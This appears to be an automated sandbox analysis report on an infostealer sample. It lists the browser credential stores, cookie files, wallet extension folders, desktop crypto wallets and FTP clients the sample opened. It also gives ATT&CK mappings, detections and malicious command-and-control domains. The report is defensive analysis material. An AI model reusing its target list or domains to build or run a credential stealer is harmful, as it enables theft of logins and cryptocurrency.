Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\DTBZGIOOSO
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\IVHSHTCODI
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\MNULNCRIYC
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\ONBQCLYSPU
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\PSAMNLJHZW
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\TTCBKWZYOC
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\WUTJSCBCFX
              Source: C:\Users\user\Desktop\file.exe | Directory queried: C:\Users\user\Documents\XQACHMZIHU
              Source: Yara match | File source: 00000000.00000003.2225779181.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2208047140.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2182520412.0000000001061000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2207678543.0000000001061000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2182548936.0000000001067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 5536, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: file.exe PID: 5536, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count of matching signatures, techniques without a number did not match)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
              Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
              Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
              Defense Evasion: 34 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
              Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
              Discovery: 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 File and Directory Discovery; 223 System Information Discovery; Wi-Fi Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
              Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
              Command and Control: 11 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
              Source | Detection | Scanner | Label
              file.exe | 45% | ReversingLabs | Win32.Infostealer.Tinba
              file.exe | 100% | Avira | TR/Crypt.TPM.Gen
              file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
              https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | URL Reputation | safe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
              http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
              https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | 0% | URL Reputation | safe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
              https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0% | URL Reputation | safe
              http://crl.micro | 0% | URL Reputation | safe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
              http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
              http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
              http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0% | URL Reputation | safe
              https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              crisiwarny.store | 104.21.95.91 | true | true | | unknown
              presticitpo.store | unknown | unknown | true | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              presticitpo.store | true | | unknown
              scriptyprefej.store | true | | unknown
              https://crisiwarny.store/api | true | | unknown
              necklacedmny.store | true | | unknown
              fadehairucw.store | true | | unknown
              navygenerayk.store | true | | unknown
              founpiuer.store | true | | unknown
              thumbystriw.store | true | | unknown
              crisiwarny.store | true | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://crisiwarny.store/apii | file.exe, 00000000.00000002.2277987160.0000000001083000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://crisiwarny.store/apifeM | file.exe, 00000000.00000003.2238094568.0000000001083000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://crisiwarny.store/apie | file.exe, 00000000.00000003.2194155395.0000000001061000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
